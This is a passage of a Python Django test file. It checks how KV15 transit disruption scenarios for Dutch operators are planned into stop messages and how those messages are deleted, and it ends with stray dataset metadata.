        m3 = Kv15ScenarioMessage(scenario=a, dataownercode='HTM', messagecontent='We rijden toch misschien wel hier niet!')
        m3.save()
        Kv15ScenarioStop(message=m3, stop=self.haltes[3]).save()
        Kv15ScenarioStop(message=m3, stop=self.haltes[4]).save()
        a.plan_messages(self.user, now(), now()+timedelta(hours=3))
        msgs = Kv15Stopmessage.objects.filter(dataownercode='HTM')
        self.assertEqual(3, msgs.count())
        # Message code numbers are expected to start at 5000 and increment.
        self.assertEqual(msgs[0].messagecodenumber, 5000)
        self.assertEqual(msgs[0].dataownercode, 'HTM')
        self.assertEqual(msgs[0].messagecodedate, now().date())
        self.assertEqual(msgs[0].messagecontent, m1.messagecontent)
        self.assertEqual(msgs[0].stops.all()[0].userstopcode, self.haltes[0].userstopcode)
        self.assertEqual(msgs[0].stops.all()[1].userstopcode, self.haltes[1].userstopcode)
        self.assertEqual(msgs[1].messagecodenumber, 5001)
        self.assertEqual(msgs[1].dataownercode, 'HTM')
        self.assertEqual(msgs[1].messagecodedate, now().date())
        self.assertEqual(msgs[1].messagecontent, m2.messagecontent)
        self.assertEqual(msgs[1].stops.all()[0].userstopcode, self.haltes[2].userstopcode)
        self.assertEqual(msgs[2].messagecodenumber, 5002)
        self.assertEqual(msgs[2].dataownercode, 'HTM')
        self.assertEqual(msgs[2].messagecodedate, now().date())
        self.assertEqual(msgs[2].messagecontent, m3.messagecontent)
        self.assertEqual(msgs[2].stops.all()[0].userstopcode, self.haltes[3].userstopcode)
        self.assertEqual(msgs[2].stops.all()[1].userstopcode, self.haltes[4].userstopcode)
        # One Kv15ScenarioInstance link per planned message.
        self.assertEqual(3, Kv15ScenarioInstance.objects.count())
    def test_plan_scenario_complete(self):
        """A message with every optional KV15 field set (priority, type,
        reason/effect/measure/advice) is planned and the fields carry over."""
        a = Kv15Scenario(name="Test complete scenario with all fields")
        a.save()
        m1 = Kv15ScenarioMessage(scenario=a, dataownercode='CXX', messagecontent='This trip will not operate')
        m1.messagepriority = MESSAGEPRIORITY[0][0]
        m1.messagetype = MESSAGETYPE[0][0]
        m1.messagedurationtype = MESSAGEDURATIONTYPE[0][0]
        m1.reasontype = REASONTYPE[0][0]
        m1.subreasontype = SUBREASONTYPE[0][0]
        m1.reasoncontent = "Oorzaak uitgelegd"
        m1.effecttype = EFFECTTYPE[0][0]
        m1.subeffecttype = SUBEFFECTTYPE[0][0]
        m1.effectcontent = "Gevolg uitgelegd"
        m1.measuretype = MEASURETYPE[0][0]
        m1.submeasuretype = SUBMEASURETYPE[0][0]
        m1.measurecontent = "Aanpassing uitgelegd"
        m1.advicetype = ADVICETYPE[0][0]
        m1.subadvicetype = SUBADVICETYPE[0][0]
        m1.advicecontent = "Advies uitgelegd"
        m1.save()
        Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
        start = now()
        a.plan_messages(self.user, start, start+timedelta(hours=5))
        msgs = Kv15Stopmessage.objects.filter(dataownercode='CXX')
        self.assertEqual(msgs[0].messagepriority, m1.messagepriority)
        self.assertEqual(1, Kv15ScenarioInstance.objects.count())
    def test_plan_scenario_delete(self):
        """delete_all() soft-deletes future messages; force_delete() then
        removes the row and cleans up its Kv15ScenarioInstance link."""
        a = Kv15Scenario(name="Test scenario and deletion")
        a.save()
        m1 = Kv15ScenarioMessage(scenario=a, dataownercode='WSF', messagecontent='Minder boten ivm storm!')
        m1.save()
        Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
        start = now()
        a.plan_messages(self.user, start, start+timedelta(hours=5))
        msgs = Kv15Stopmessage.objects.filter(dataownercode='WSF')
        self.assertEqual(msgs[0].messagepriority, m1.messagepriority)
        self.assertEqual(1, Kv15ScenarioInstance.objects.count())
        a.delete_all()
        # Soft delete: no non-deleted messages or instances remain.
        self.assertEqual(0, Kv15Stopmessage.objects.filter(dataownercode='WSF', isdeleted=False).count())
        self.assertEqual(0, Kv15ScenarioInstance.objects.filter(message__isdeleted=False).count())
        # Check we can still force delete and the scenario instance object is cleaned up
        msgs[0].force_delete()
        self.assertEqual(0, Kv15Stopmessage.objects.filter(dataownercode='WSF').count())
        self.assertEqual(0, Kv15ScenarioInstance.objects.count())
    def test_plan_scenario_delete_active(self):
        """delete_all() must leave messages planned in the past untouched
        (the plan window here ended 3 hours ago)."""
        a = Kv15Scenario(name="Test scenario and deletion")
        a.save()
        m1 = Kv15ScenarioMessage(scenario=a, dataownercode='WSF', messagecontent='Minder boten ivm storm!')
        m1.save()
        Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
        start = now()
        a.plan_messages(self.user, start-timedelta(hours=5), start-timedelta(hours=3))
        msgs = Kv15Stopmessage.objects.filter(dataownercode='WSF')
        self.assertEqual(msgs[0].messagepriority, m1.messagepriority)
        self.assertEqual(1, Kv15ScenarioInstance.objects.count())
        a.delete_all()
        # The past message survives undeleted.
        self.assertEqual(1, Kv15Stopmessage.objects.filter(dataownercode='WSF', isdeleted=False).count())
        self.assertEqual(1, Kv15ScenarioInstance.objects.filter(message__isdeleted=False).count())
    def test_delete_scenario(self):
        # Ensure deleting a scenario doesn't delete messages
        a = Kv15Scenario(name="Test scenario and deletion")
        a.save()
        m1 = Kv15ScenarioMessage(scenario=a, dataownercode='WSF', messagecontent='Minder boten ivm storm!')
        m1.save()
        Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
        start = now()
        a.plan_messages(self.user, start-timedelta(hours=5), start-timedelta(hours=3))
        msgs = Kv15Stopmessage.objects.filter(dataownercode='WSF')
        self.assertEqual(msgs[0].messagepriority, m1.messagepriority)
        self.assertEqual(1, Kv15Stopmessage.objects.filter(dataownercode='WSF', isdeleted=False).count())
        a.delete()
        self.assertEqual(0, Kv15ScenarioInstance.objects.count()) # Lose the association, but doesn't matter
        self.assertEqual(1, Kv15Stopmessage.objects.filter(dataownercode='WSF', isdeleted=False).count())
        # Scenario, its messages and its stop links are gone; the planned
        # stop message remains.
        self.assertEqual(0, Kv15Scenario.objects.count())
        self.assertEqual(0, Kv15ScenarioMessage.objects.count())
        self.assertEqual(0, Kv15ScenarioStop.objects.count())
"joelhaasnoot@gmail.com"
] | joelhaasnoot@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.